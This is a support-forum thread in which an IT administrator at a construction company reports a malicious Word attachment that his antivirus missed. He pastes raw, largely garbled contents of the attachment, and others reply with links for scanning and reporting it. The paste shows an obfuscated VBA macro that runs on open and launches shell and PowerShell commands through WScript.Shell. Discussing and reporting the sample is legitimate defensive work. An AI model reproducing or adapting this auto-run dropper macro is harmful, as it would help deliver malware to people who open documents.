Missed mail message

[REDACTED]

I received a suspicious email message and looked at the contents via text editor. Some of the message concerns me as I'd have to perform cleaning on a coworker's computer if they had blindly opened it. Shouldn't this sort of thing be caught?

Some contents from the attachment:

Code: [Select]

WScript.Shell$p
BPrxh1oÿÿhÿÿÿÿ`ÿÿÿÿ
±Attribute VB_Name = "VndRBbniaq"

Sub AutoOpen()
On Error ResubNext
CreateObject("WScript.Shell").Run! ChrW( 2 + 3950) ztXZmEVS
hzGljvbXiwb

wbEBOkTwFzZJzK‚YjoLbP PZiIjlhHCiaBzEQVvSQMiWUrRzTLkXKmtJwXBoa, 843069887 -
End €t

xID="{E9C25DD8-1F86-4D50-A06F-C826EF022DE9}"
Document=MMYbpnrz/&H00000000
Module=oGhNIGEoMzPhc
Module=VndRBbniaq
ExeName32="amiiiSXjuQZkqY"
Name="Project"
HelpContextID="0"
VersionCompatÌa¯
ÿ  ä


*\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL#Visual Basic For Applications
*\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\Program Files\Microsoft Office\Root\Office16\MSWORD.OLB#Microsoft Word 16.0 Object Library¼*\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\Windows\system32\stdole2.tlb#OLE Automation*\CNormal*\CNormal9IX](
*\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL#Microsoft Office 16.0 Object Library
...

Code: [Select]

Attribute VB_Name = "oGhNIGEoMzPhc"
Function wbEBOkTwF()
On Error Resu
pNext
i HNMbjŠ46446 / wwwpVf
  ‚ 6933586YhVEE -  jKFCQBthZR*IsArray nhsYwArBsfnA^fOSuz
¤M@" + "d /v:^on^" ^   /r

CStr(Chr(EXVUXj€iYRToZMBoJflHUWcHJUB€34DALsKFcubFwEwPJaiCfkbl))"s^‚0e^T
€VarType CDate(143449149
€XGdutGiprnDAWK P^X^H$='^ pow^er( 0e^ll -„
 ^J^:BIƒE:„ I^‰DCur(XilZn‚u±LMbaj€F¿…©YMiWXK
€
TGspYZ €* kUqzwA zJiAn€Ybz DSmnWÁq":D^SB"w^:Â
9
ƒ
G{^:Z^,Q‚^B3CC&#Á‚:bwBiÃÔ^GCo€,€,„Hex(lbDzWkÀzfinShAÀ
PjKjGÀ
FrsVQ‹0Sqr@(37376ÀcI VJHalÀ 68087À
rCEbskin(RZmthzËMonth(NarlcAwuBGC
kB^44H,^:^&I„/B5B.@GU1Â^:d‰165Î8À\ƒ36A…€F=8AzDwYÀTqNUNwN:ƒ´@Fqƒ Zƒ,Bi„$E;:bb„XBp:ÀWˆàA tn(75Ë"Second(UXVoZC€iHmVqhAGÁU:^bgB"#:D(±$J:^cÃLâ":ƒ
H^YÂ
^:,g!%LLog(8372¡145846ceeQHiHhuàNFnFlS‚z Q86839`9ÀFVLSsD"€…A=tclUXh€`sqzMd"$¤9P^:CqDaD6B†#e7ƒ,:q:$!6:C8d^L^w51613à49 5
‘41833@Dpopia+`Kb;ztzU@dYjbYSAB²k„Gkeâ
w)˜p:^àJB:YEh0(:C{B`>Z,fBCh:^¡mc
Y,Bz¤G8:^ZIOct(wUpsdSK.&M!A61540ÀcEruNad
16717@fwZVYwƒ#¥.IBmRM3 UGchY"RzzZp`dijdA«HCXDC W cOdDT@COqrzÀ73025
LiNmOlLjA‚‰g^BD^#ÄC^{$
^‚Zƒ B^1:Cc P8:Uw#
B7
"
eKRouàW32424àGjujOKTimeValue(IiiajV£Å246060082
fdtArdNdHZjla6Ggd6d¦:C5@IH:„].£m@v N‚8`5ÄOwBv¤G^;:^Jaƒ,`g
¥*C

(MzWTnACk#3984àHFbnRIPhMÌjZa€
^G£ Ī{@@â
2 $@wBbÁ/^:G;À°Ý#
tåÃ
ÀGdá#f}%àiv+ ék+ Ia+ CR+ (K+s }dD+ 3:ð
×0+’ X + I+ è;71+4ÔK†,‘E59500'52241 DcKmcCÁqEtWI“ö
r;/ nAPKz€j
End õŒ˜zZJzKYo<e c±~a’(F°zKzp£µ
9‚4`78258¢áú7mioV”xò Äb6
Dbl(ZIHMSJàiYbfUQ €$0:G(›By^ÀµN^E`2_c¤'ä[ð6B^Å‚,È^:qT.:6€è) rovPD <23H59030‘Q-@ iTEAaÀQOOVYpWTqhT
cwFo€EaZvHDhÑ
˜C^8ãÓb^w°i¤H;Ãbwôd4
ðQ`dxk4jdfRjJay9s³tYhqwD SklcrJ!UpoN‘ŒXp0zNQd€?875520zzKjôQE"3EJLzKUG³ÕWYJnJ
`IuzBG
@acioUa^#ÔG^kƒ:^Æd„t^l:H³R;à:Lg
B4:ôG8¤b¥”CÓð|{ÐiÅ54961ÀhwzZrmP lwuJfp58,74ó¥A aSija]cDAXDMlo2~0Z^wCð²D°J a:B
²H%’V^,Ë1Y²G :N¢ul 'à V.98275àwQLstcò##v3452hMNMdpP
XTi„boÐMhTpÁÀilHRZqZÑ? awpTR bJøKUi’$P”@ôZ?\³cã
S.g¼:v2
t–BÀ
A70091Ð V wavnV`$82‚6ѧszXoHB
Ãfä+SfjMB¦
133@‘* wVYij@7218!CP
EzvoY~z" Åd² `–p¢Z]p'pe%5BD:õ¤b,P¡w#
QãMÐÉóD+ ù:+ d-`
g¦" _+ D Š480XðKisNQ‚jÀaGpKLq`JkfRiû¢×uPHZBiZ€®VA{XtnzkÀE0ovAY»v#Cv8koZ`ÿ[’éjohLbPï[eä[UCos(-eá31405Ð CsLLzBv`7138áwvIRS]402„88ð
3399ƒ^e7qÌü-!SjEJ‚mÀDViVP2+‚p„BC{:^Y…Ãð82G^#:€©²e“i´^HpÞ`":@«´ñŸ"
H^I^:RÙ8b281A!…DzTTT‚,`:^z:D¢!ø¹ "I^" + ":Vwp^BN€^E^,^:P,0B"
iHNMbj = Sgn(358)
   Var Type
Na@me(6332IsArray 80382 / Hwbha
wadHLE"^o^:Hw,^:^d¢:B^wD
"&L©:vG^{›a,B2:G%E:qwBp1C^{0¼Val(4P]CByte(5
[kHRjnqNa^,BB/…!8^:U@:^`:C‚/{:^…„ B\w:^Gk€…f#"g„rJ¨w^BS^„'q€K ³dObNzo * FCkjHC - FLCrjW
¥iBUq

RiEjupYjsW,7ƒ(ƒO,„:Z^gB3ƒ¨H^o„>I:ÉCDa€@7315)ÀJiMCLUSszdrA9:CV:ÀÂJ9{2DÐ^U:.‚,€EF‚(<J:B^Iƒ®E…À8Â:À,6ZZCH€$eSqr(jFwYYv@$À™FŸLog(579@lHITPÂMÂ(Y:^.:‚mƏHÀ'BY€D%GkÀE¦Rmcap‚Z@XVEsziÀ
6615€WWfa\tJB·E
A#2"S`tr(62»…-Round(33403ftsYz‚cÀ
GwaCl
S@:^Yw:r„>Câq‚':^XÅBÄÀ˜&(ƒB
^JÄmBm…@Ìqeg:rX Lg
êjoLb‚PDViVPÀù`DzTTTÀ
CÞ+ ¹+ æG+ iÉh>+ %++ J! iIUGb`59È804
31
`' oBftF*TimeÀmue(ih8RcdÃ'%áplOcUAÃÆ;93605À swCzuW
End Function

%
PZiIj(`On Error Resume Next
A©98225 gsddzA nsAAoà
78027
SXPjvZbFoÁ3C+l:Hã.g :^Z^,c
:`+â$1D‚
(„‘ZgeÂ
B€“HIB
fZ$\B06G;:^aB’eKCCur !oè©qMXtN
YAktid

PYWHFro„KwÂ:o:Cã%@V \^3äG^,g:¤B:#p^:Gƒ¡%huZcc@8chdPIJ€
 "12`;FAE\Ecb9æ2[4¬¾LCase(zoGQt )GvORZŒGk!¥ :^k¤bE#Z^:d‚C:Ckc
:^ewB#e
Á€æoLwCHMÀ61850AÀ26068`n0jRtoKƒ˜96ƒue@hDbVp dvSWTwzocGwdfHPt‘^:e5^7…±7 ࢣ+R 9„¼$:'æÓäºBE^G#€ÅCd^wˆZUuAtL€+zFm
c«‹R@†GAMlBr@0BcnRmbm kLHLs@aFuUw@QrEwbb  BPEdNw
DWDsN`kSIYGaã=/KáÑTbÓB0‚^Ï` 4ÀÖ/+ '&p?ɤ+ ù+ ‡»QY1Yï:; lhHhCiaÿ:eô:æCBool(oWfitP%1Sin(2”{¦31XMHJXrqÀZTdlqhQI!:G3Ð,:R^Ä9p
Rõb:µ=:ˆCsEñ4C@%$8527±N804181‚70477€lBcE‚c!4dUXsM `pqQFX;!O83A,ATCTQsCó
•1889ORjKOzm
GPWOCD¡3p;gat^L::ã
C+´+dIS@w.¤
H^¨::K‚^Tœ^‚PžÀ
7Q5925árIIf±<AÑoszQDtð)KKlhið
73397ðHVMiWn£åÁ rUobbXk
qGD@[°V iZcwIË8439¡zmYbR‚m°.rTzuOpsnUcvN
boYhTUQV!k9b¢
gB2‹rP8‚^:a€¢B^ló;C#:d^SÓ
,^vF#£Uh^:bÛ>g™P
:S°
%Sec"o :238}(Deàc(4000€ö!‚78310AzppDóå
70021 tEiibp€itzibfÀKbthKC5`99€&tFWvaJ012006pnIzWzK
TjSPiDZHXCB.Ô.†H°›CšwB^i¤!`^HI:Ztm£0Û’(”ÄB9
#ƒ!Cu90172@YHiFFH0 Z FtLZm€uT,iI ¹#C¡zoBuzÀjGiKa0iDruA
°pYµ7^ôU#dÃ;Aªƒe³fFAzAZsƒ÷) AChIMH0`OdhaTó
¥Ca€(881S
åInt(61670ApBOMRjp4994ÁRrVJdq›KQZLmjèqDSҁaÐ5 bbf^#‚Ô½^fC
R,Î: $d„x::0yÂ
öC +Ä:I·<P
9ÆÔ Rhvhf€ GT8qJbóVQcMYpnkf°NtjLrVa!7388!
wfPcF21136
pNtqa¡fwCTM‘u€<7&9Û8Á51á,dlwaYoiwNpÞF!d
Ä€ "ÓHc
xC::€
bP0KCC@
ösCzkZpBQ£-•
qVa„uz AKjbâƒÙ#†301240 jFTjm€FQsXbiSPqzò¿@.‡ 0|D$S &C2 s^e“
T ^ c
H^q=:!C
XSÐr
c!Ø&&SÀ*$7Ñ¢À!u7514Q¾pu0jsui¥
KoˆhuuqAUG°\ƒ@fOct(2±(`fnqCJ1ãE^T3 À
43^dG=£!^€
Å;0ø^=hR
@
0
³u€'öoà{Âc+ FS+
÷A–µ + jGiKt@ziiDruÐKQZLmjqDSo`dlwaYo iwNpF4FQsXbiSPqzr4fnqCJ

   IsArray CCur(2)&iHNMbj = aViLYX / 24379nWRmm

~AHYwNu

End Fun€ction
 € BzEQV(LOn Error Resume @Next
_C€Dbl(517)bTiIpknZQjFx" s^E"p"t ^ ^   ^ k^eP
Y=^!T^4ƒ3Gƒ"
2Str(WcIYh - mhAsl€6|VarType Fix(9079€
AiIYaTZwDTc A:`&=n^!\&&‚„A€Neƒ
T ^LƒG0=!^kƒP^Yá
:$=^‰K
<|€EˆUiQTDIoGcCcIfSUDy‚ !ƒA& 2s1t FG@ ^H7M1S=Ã
!‰CL^G0^:M =^j!&ƒU Š& bhSinÀKSpBuEË„79213€„zEqjOk
À29954 * zQjWk
ÀHaTrOaA-˜S^E r cØKmCoÃ'7MÃ
1^S:(^=s!À#…hRnd(@MOzbpE€W°EVES@G‰MCÁM azbTDmD DhMavA &@‘^TÃ!Ñ v^*Bƒ6ƒ
aCK!cd^Kƒ
mCkÅ 82032€lkKOCÎEfqpNiC€RfJcTi€FnNJupU€F 59728‹O62PjfpjuQA@¸JkfjHÀ
cVLYnp
Q€PfwcbzOÁ/ˆ:^,'=^Q)UÀ¡sC'EÆ^¤Aƒ¢j^p=!v!%|Hex(BlJshD
247„96á8734 OESj'vfWDaBAB^6
aÄ:.
=^OÀ`B
1EF  s 4åLo€g(52058  ZdwrD
mLY@jPHGEIA
^ÎeE1`zƒ2VnAxäjjpÃ:B
`U=Â^ã!&seCA‡£€@Åka=!V‚ n:^#^D_0¨H@ncjkfK`X mOJHqË2ztuSzJ`7aqYdhbå;SecoP4lN10726a
9GwvH

{IWcaJ MMvmN&ˆSE^T¡â NCtf`Y#a:^{#
=^4g¢AÄ; SC¢ Z ˆ^gnÂ0^9`‚Nb
C^t:/"
ð^=^u{F©¡£8321„½Å7ÀGinadvàBpMbvsi
LbSP‚Zà"jIrTZC #BAGUvF* Z99@!FrjEc
wfuzd

qQQMSGV¬rX
–tâ  V1å–^EHbF!gn•# 0Ã9Ã:;e:hM^!&às"A^L uuIbG‚z€75244â2
¦«Oct(KMfoFàdorLE¢k
l %`%b
%-
‚ŠChr(UhvLzWYJU

wOHTjMDAhàf+ QZMAuTIt@ZWwkvwQFFL)ú)À
"`Sªbáà Ü$+ IÍ+ $½+ 9„§+ …˜ å+ Iƒs+ †j+ ó%+ò §+ £
*)±?"n@ æpjGjiK«|
ible32="393222000"
CMG="2E2C291D7965A369A369A369A369"
DPB="5C5E5B4BA778A878A878"
GC="8A888DA1BAA2BAA245"

[Host Extender Info]
&H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000

[Workspace]
MMYbpnrz=0, 0, 0, 0, C
oGhNIGEoMzPhc=25, 25, 1385, 693,
VndRBbniaq=50, 50, 1410, 718,
MMYbpnrzMMYbpnrzoGhNIGEoMzPhcoGhNIGEoMzPhcVndRBbniaqVndRBbniaq
þÿ
ÿÿÿÿ ÀF Microsoft Word 97-2003 Document
I can forward the original message for you to look at if there's someone on staff to receive it.

Thanks,

-Tim-

[Pondus]

You can check suspicious mail (s) here >>  https://www.opswat.com/free-tools/mesc-faq

[REDACTED]

Suggesting I go to another website or another company is asinine..

Maybe I'm in the wrong place.. I'm trying to report a problem with the Avast software not doing its job. I'm supposed to be protected from this:



Or, maybe I have the wrong software for my company's antivirus needs...

[Asyn]

Update to the latest version (18.6.2349): https://forum.avast.com/index.php?topic=221320.0

[REDACTED]

So..  just for thoroughness I forwarded the message to the sanitize@metadefender.com address. I immediately got a response:

Code: [Select]

  sanitize@metadefender.com
    host smtp.antispamcloud.com [5.79.72.139]
    SMTP error from remote mail server after end of data:
    550 Message contained unsafe content (Sanesecurity.Badmacro.Doc.jpecomp)

And, in the header attachment, I notice this little blurb:

Code: [Select]

X-Antivirus: Avast (VPS 180822-2, 08/22/2018), Outbound message
X-Antivirus-Status: Clean
This was all after I updated to newest version of Avast.

[Asyn]

You can report a suspicious/malicious sample (File/Website) here: https://www.avast.com/report-malicious-file.php

[Pondus]

  Maybe I'm in the wrong place.. I'm trying to report a problem with the Avast software not doing its job. I'm supposed to be protected from this:

No security program have 100% detection or zero false positives

How to report if you think avast should detect  >>  https://forum.avast.com/index.php?topic=14433.msg1289438#msg1289438


If mail contains a attachment you can upload and check it here  >>  www.virustotal.com
If detected, file will be shared among all those vendors not detecting it

You may post link to scan result here

[REDACTED]

You can report a suspicious/malicious sample (File/Website) here: https://www.avast.com/report-malicious-file.php

Reported.

If detected, file will be shared among all those vendors not detecting it

You may post link to scan result here

Results:



I get that not every anti-virus program is 100% because it's not possible to guard against threats that have not been invented. I was trying to report something. Please read the full message before garnishing your pre-programmed responses. The last line of my first post was referring to the step that we just arrived at (reporting the problem).

These emails are unfortunately not infrequent and if they hadn't increased in numbers lately I wouldn't be trying to reach out. I've been lucky and not had any of my coworkers open anything, but I don't know if I'll continue to have that luck. I'm handling the IT for a construction company so the people I'm working with aren't necessarily the most computer savvy.